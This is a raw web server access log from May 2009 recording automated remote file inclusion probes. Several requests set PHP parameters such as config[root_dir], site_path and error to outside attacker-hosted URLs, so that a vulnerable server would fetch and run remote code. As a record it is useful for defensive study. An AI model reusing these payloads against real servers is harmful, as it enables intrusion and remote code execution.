118.127.17.214 - - [31/May/2009:09:03:49 -0400] "GET /logs/access_log.Q109050300/http://lol.vc/testor.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
118.127.17.214 - - [31/May/2009:09:03:49 -0400] "GET /http://lol.vc/testor.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
118.127.17.214 - - [31/May/2009:09:03:50 -0400] "GET /logs/http://lol.vc/testor.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
216.15.161.2 - - [31/May/2009:09:03:54 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.bikelister.com/test.txt?? HTTP/1.1" 200 3568 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
216.15.161.2 - - [31/May/2009:09:03:54 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.bikelister.com/test.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
213.246.62.35 - - [31/May/2009:09:03:59 -0400] "GET /errors.php?error=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:09:03:59 -0400] "GET /logs/errors.php?error=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.119.158.133 - - [31/May/2009:09:04:11 -0400] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
85.119.158.133 - - [31/May/2009:09:04:11 -0400] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
217.147.29.190 - - [31/May/2009:09:04:15 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:04:19 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
